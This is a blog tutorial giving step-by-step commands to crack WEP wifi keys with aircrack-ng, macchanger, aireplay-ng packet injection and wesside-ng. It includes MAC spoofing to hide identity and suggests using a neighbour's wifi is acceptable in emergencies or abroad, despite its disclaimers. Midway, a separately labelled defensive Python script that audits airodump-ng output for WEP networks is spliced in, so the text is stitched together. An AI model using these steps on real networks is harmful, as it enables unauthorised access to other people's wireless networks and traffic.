*Warning: This guide is for educational purposes only, do not crack your neighbor’s or anyone’s wifi as it’s illegal to do so in the U.S. Please check with your country’s local law for those of you outside the U.S. and use common sense when hacking WEP.
Yesterday I had the pleasure of cracking my very first WEP key. Of course, it was my own wireless connection I hacked, but I found it to be an invaluable skill to learn just in case I go traveling around the world one day and find myself without a wireless connection; let’s say somewhere in Thailand, for example, I might need to hack WEP for emergency purposes.
Cracking WEP is “highly” illegal (if you crack someone else’s wifi, that is) in the U.S. and I don’t advise you to do that, but learn the skills of cracking WEP for emergencies.
For example, if there was an earthquake one day and your home got destroyed in the process (where it left you stuck in your basement), it might then be okay to use your neighbor’s wifi so you can use Twitter and alert your family and friends that you are stuck inside your home’s basement. (This actually happened in recent Chile earthquake where a family member used Twitter as communication.)
There are a ton of times where knowing how to crack WEP can come in handy under emergency circumstances, especially if you are traveling in another country.
Anyways, there’s a Linux live CD distro you can download called BackTrack that comes with a bunch of tools to crack WEP keys, but in my testing I found that BackTrack actually had worse driver support than my regular ol’ Ubuntu Linux. I think it’s better to use your own Linux (such as Ubuntu) and just install aircrack, which is easy with apt-get (or yum for other distros).
So, today I will show you how to do it with Ubuntu. For those of you who haven’t yet, you can go and make your own persistent Ubuntu Linux USB flash drive first.
1. First, you will need to uncomment any repositories being commented out under /etc/apt/sources.list.
Next type, “sudo apt-get update”.
Next type, “sudo apt-get install aircrack-ng”.
Next type, “sudo apt-get install macchanger”.
*If macchanger doesn’t install the first time, try apt-get update and try again.
Next type, “sudo apt-get update”.
Next type again, “sudo apt-get install macchanger”.
2. Make sure to turn off your wifi connection now by right-clicking the connections icon at the top right of the screen and unchecking “disable Wireless”.
3. Next type “ifconfig” and/or “iwconfig” to find out your WiFi card’s Linux handle, such as eth0, wlan0, or ath0.
Once you find out what it is, make a note of it.
Mine was “wlan0” as shown here:
*Replace any wlan0 in the following steps with your wifi’s handle, such as eth0, eth1, ath0, wlan0, or whatever.
4. Next type “sudo airmon-ng stop wlan0”.
Next type “sudo ifconfig wlan0 down” (the interface must be down before its MAC address can be changed).
Next type, “sudo macchanger --mac 00:11:22:33:44:55 wlan0”. This will change the MAC address of your WiFi card to 00:11:22:33:44:55 temporarily so it will be easy to refer to (and will also hide your real MAC address, just in case).
Next type, “sudo airmon-ng start wlan0”.
Here’s a screenshot of what I did:
5. Next type, “sudo airodump-ng wlan0”.
You will probably see a bunch of wireless hotspots around where you are. Here, you can choose your own WiFi router for testing. Note the MAC address and the channel of your WiFi router shown here.
6. Next type, “sudo airodump-ng -c 10 -w testing --bssid 00:23:FG:23:45:43 wlan0” where 10 is the channel number you noted in the step before and 00:23:FG:23:45:43 is the MAC address. (yes, please replace them!!!) (and “testing” is the filename prefix for the capture; it can be anything)
You should get a window like below. Make sure to keep watching the #Data column: that’s how many packets you have captured to decipher later.
Open up a new window and type, “sudo aireplay-ng -1 0 -a 00:23:FG:23:45:43 -h 00:11:22:33:44:55 wlan0” where 00:23:FG:23:45:43 should be replaced (again) with your own WiFi router’s MAC address.
*Note: If you get a message saying that you’re on the wrong channel, keep doing the command until you get through.
7. Wait until the above process completes, then open up another new window and type,
“sudo aireplay-ng -3 -b 00:23:FG:23:45:43 -h 00:11:22:33:44:55 wlan0” and change “00:23:FG:23:45:43” to your WiFi router’s MAC address.
8. Next, open up another new window and type:
sudo aircrack-ng -b 00:23:FG:23:45:43 testing-01.cap where 00:23:FG:23:45:43 is your WiFi router’s MAC and testing is the filename prefix you chose in step 6.
You should see that aircrack is starting to crack your WiFi router now; if it doesn’t, just wait, as aircrack will retry every 5000 packets.
Here’s what it looks like while you are cracking WEP:
You should be able to crack your own WiFi’s WEP with about 15,000 or 30,000 packets. It all depends on how much activity is going on within your own WiFi router. If someone is downloading a huge YouTube video, it’s going to be faster than on a wifi network that’s not being used at all (in which case it might take a whole day).
When it cracks the WEP, you will get a screenshot like below:
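The `-w testing` prefix from step 6 also makes airodump-ng write a `testing-01.csv` file next to the `.cap`. The script below is an added defensive example, not part of this post: it parses that CSV and lists every access point still advertising WEP, along with how many IVs have already been seen, so you can find which of your own routers need to be moved to WPA2. The column header is the one airodump-ng writes; the sample rows and their MAC addresses are constructed for the demonstration.

```python
import csv

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# the access-point table, a blank line, then the station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 10, 54, WEP, WEP, , -40, 120, 15233, 0.0.0.0, 7, HomeNet, 
00:11:22:AA:BB:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -55, 98, 0, 0.0.0.0, 9, Office-5G, 
00:11:22:AA:BB:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, OPN, , , -70, 40, 0, 0.0.0.0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 300, 00:11:22:AA:BB:01,
"""


def parse_access_points(csv_text):
    """Return the access-point rows of an airodump-ng CSV as a list of dicts.

    Only the first table (access points) is parsed; the blank line that
    separates it from the station table ends the scan.
    """
    ap_lines = []
    for line in csv_text.splitlines():
        if not line.strip():
            if ap_lines:
                break  # blank line after the AP table: stop here
            continue  # tolerate leading blank lines
        ap_lines.append(line)
    reader = csv.DictReader(ap_lines, skipinitialspace=True)
    rows = []
    for row in reader:
        # Values may carry trailing whitespace; normalise every field.
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k is not None})
    return rows


def security_grade(privacy):
    """Map airodump-ng's Privacy field to a simple audit verdict."""
    tokens = set(privacy.split())
    if not tokens or "OPN" in tokens:
        return "open"      # no encryption at all
    if "WEP" in tokens:
        return "broken"    # WEP: key recoverable from captured traffic, as this post shows
    if "WPA2" in tokens or "WPA3" in tokens:
        return "ok"
    return "legacy"        # WPA (TKIP-era) only


def find_wep_networks(csv_text):
    """Return (bssid, essid, channel, ivs_seen) for each AP still using WEP."""
    findings = []
    for ap in parse_access_points(csv_text):
        if security_grade(ap.get("Privacy", "")) == "broken":
            findings.append((ap["BSSID"], ap["ESSID"], int(ap["channel"]), int(ap["# IV"] or 0)))
    return findings


if __name__ == "__main__":
    # Real use: open("testing-01.csv").read() instead of SAMPLE_CSV.
    for bssid, essid, channel, ivs in find_wep_networks(SAMPLE_CSV):
        print(f"WEP still enabled on {essid} ({bssid}, channel {channel}); {ivs} IVs already captured")
```

Run it against your own `testing-01.csv` after step 6; any router it lists should be reconfigured for WPA2 (or WPA3 where the hardware supports it), since the IV count shows how quickly the material needed for step 8 accumulates on an ordinary home network.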
How to Automate WEP Hacking using Wesside-NG!
You can also try the automated WEP hacking; it will basically run all the commands from Step 4 onward for you.
sudo wesside-ng -i wlan0
If you get Max Retransmits messages, try:
sudo wesside-ng -i wlan0 -k 1
Also, if you want to hack WEP on a specific SSID do:
sudo wesside-ng -i wlan0 -v XX:XX:XX:XX:XX:XX
(where XX:XX:XX:XX:XX:XX is that network’s router MAC address, i.e. its BSSID)
Remember, it’s illegal to crack WEP (in most countries) and I highly advise you to only test it on your own WiFi for educational purposes!
If your Ubuntu live USB flash drive doesn’t support your wireless adaptor (you can’t connect to the internet), you will probably have to get that working first. Also, not all wireless adaptors are supported by aircrack; I used an Intel WiFi Pro 2200 and an Intel WiFi 4965 with success. I think most Intel/Atheros cards will work fine, but most Broadcoms might not. If it doesn’t work, just get a USB wireless adaptor for this test.
WiFi Robin – If you are not good at linux or this is confusing to you, check out the WiFi Robin, a standalone WEP cracking device.